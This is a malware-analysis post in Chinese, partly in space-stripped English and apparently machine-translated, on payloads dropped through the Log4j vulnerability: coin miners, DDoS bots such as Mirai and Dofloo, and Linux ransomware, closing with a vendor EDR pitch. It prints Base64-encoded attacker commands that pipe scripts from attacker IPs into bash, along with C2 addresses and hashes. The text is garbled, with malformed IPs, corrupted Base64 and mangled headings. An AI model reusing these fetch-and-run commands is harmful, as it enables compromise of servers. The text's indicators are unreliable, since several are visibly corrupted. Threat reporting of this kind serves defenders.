上周,Log4j漏洞颠覆互联网,影响巨大。攻击者也开始利用该漏洞,到目前为止,Uptycs研究人员已经观察到与积极利用该漏洞的挖矿程序、DDOS恶意软件和一些勒索软件变体相关的攻击。勒索软件攻击的规模在未来几天可能会增加。由于漏洞的严重性,还可能会发现一些绕过当前补丁级别或修复的变体。针对此类攻击持续监控和强化系统非常重要。Uptycs之前在博客文章中为客户分享了补救和检测步骤的详细信息。它还讨论了攻击者利用Log4j漏洞的各种恶意软件类别。Uptycs威胁研究团队确定了在易受攻击的服务器上投放的不同类型的有效负载。有效载荷包括众所周知的恶意软件,例如Kinsing和Xmrigcoinminers,以及Dofloo、Tsunami和Mirai僵尸网络恶意软件。除了这些恶意软件家族之外,攻击者还开始在易受CVE-2021-44228攻击的服务器上部署勒索软件。1.XmrigXmrig是一个开源的MoneroCPUMiner,用于挖掘Monero加密货币。在利用Log4j2漏洞后,攻击者试图运行包含下载xmrig矿工命令的恶意shell脚本。命令为93.189.428[]:5557,/base/commands/Base64/encodingKGN1cmwgLXMgOTMuMTg5LjQyLjgvbGguc2h8fHdnZXQgLXEgLU8tIDkzLjE4OS40Mi44L2xoLnNoKXxiYXNo。此命令下载矿工shell脚本/46bd3a99981688996224579db32c46af17f8d29a6c90401fb2f13e918469aff6shell脚本(参见图1)首先杀死已经运行的矿工二进制文件,然后从互联网下载xmrig矿工二进制文件并运行它。图1:Shell脚本下载并执行Xmrig2.KinsingKinsing是一种自我传播的加密货币挖矿恶意软件,之前以配置错误的开放Docker守护进程API端口为目标。Kinsing恶意软件是用golang编写的,通常通过恶意shell脚本投放。Thekinsingshellscriptincludesseveraldefenseevasiontechniquessuchassetfaclusage,chattrusage,logdeletioncommands,etc.Attackersfollowingamassivescanattempttoplacekinsingbinariesonvulnerableservers.攻击者用来删除和运行shell脚本的:92.242.40[.]21:5557,/Basic/Command/Base64/KGN1cmwgLXMgOTIuMjQyLjQwLjIxL2xoLnNofHx3Z2V0IC1xIC1PLSA5NDAGugc2gEg2gEg2gEg2.在shell脚本:7e9663f87255ae2ff78eb882efe8736431368f341849fec000543f027bdb4512)中,我们可以看到攻击者在shell脚本运行时放置commandtoremovethekinsingmalwarebinary(seeFigure2).Figure2:DownloadingKinsingviashellscriptThekinsingshellscriptalsocontainsdocker-relatedcommandsthatkillalreadyrunningminerprocessesonthevictimsystem,ifpresent.Figure3:Thedockercommandusedtokillanalreadyrunningminer3.DDoSbotnetpayloadsInsomeexploitattempts,attackersattemptedtodropDistributedDenialofService(DDoS)malwarebinariessuchasdofloo,Mirai.4.DoflooDofloo(akaAeSDdos,flooder)isaDDoStypeofmalwarethatcanperformvariousfloodingattacksontargetIPaddresses,suchasICMPandTCP.Inadditiontofloodingattacks,Doflooensuresitspersistencebymanipulatingtherc.localfileonthevictim'ssystem.Someofitsvariantsdeploycryptocurrencyminersonvictimcomputers.Inintelligencesystems,attackersarealsoexploitingvulnerableserverstodropDofloomalware.Thefullcommandusedbytheattackeris81.30.15743[]:1389,/Basic/Commands/Base64/d2dldCBodHRwOi8vMTU1Ljk0LjE1NC4xNzAvYWFhO2N1cmwgLU8gaHR0cDovLzE1NS45NC4xNTQuMTcwL2FhYTtjaFhYTtjaFWhFhF4YvYW.W下图(参见图4)显示了Dofloo对在Log4j后期开发中使用的rc.local:6e8f2da2a4facc2011522dbcdacA509195bfbdb84dbdc840382b9c40d7975548)变体的操纵。图4:Dofloo操作rc.local5。mushtikTsunami(又称mushtik)是一种基于DDoSflooder的跨平台恶意软件,在文件下载过程中在被感染系统中执行shell命令。海啸样本:4c97321bcd291d2ca82c68b02cde465371083dace28502b7eb3a88558d7e190c)使用crontab进行持久化。除了持久性之外,它还会删除/dev/shm/目录的副本作为防御规避策略(参见图5)。图5:Tsunami通过cron6从/dev/shm运行。MiraiMirai是一种恶意软件,它会感染运行在ARC处理器上的智能设备,将它们变成远程控制机器人的网络。Mirai也通过恶意shell脚本进行传播。攻击者使用的命令为45.137.21[.]9:1389,/Basic/Command/Base64/d2dldCAtcSAtTy0gaHR0cDovLzYyLjIxMC4xMzAuMjUwL2xoLnNofGJhc2g=。此命令使用wget实用程序从攻击者C262.210.130[.]250中删除Mirai恶意软件(参见图6)。图6:从C2下载mirai的Shell脚本7.Linux攻击者还利用Log4j漏洞在易受攻击的服务器上投放Linux勒索软件。攻击者在利用Log4j漏洞后试图投放Linux勒索软件:5c8710638fad8eeac382b0323461892a3e1a8865da3625403769a4378622077e。勒索软件是用golang编写的,并操纵ssh文件在受害者的系统中传播。攻击者丢弃的赎金票据如下所示(见图7)。图7:Linux赎金票据8.UptycsEDRUptycsEDR使用映射到MITREATT&CK和YARA进程扫描的行为规则成功检测到所有有效载荷。我们的行为规则主动检测到的Linux勒索软件示例如下所示(见图8)。图8:使用UptycsEDR进行勒索软件检测9.Xmrig除了行为规则外,UptycsEDR还会在触发YARA检测时通过威胁研究团队制定的YARA规则分配威胁配置文件。用户可以导航到检测警报中的“套件数据”部分,然后单击名称以查找套件的描述。UptycsEDR检测到的Xmrig恶意软件活动的摘录如下所示(见图9)。图9:使用UptycsEDR的XMrig检测
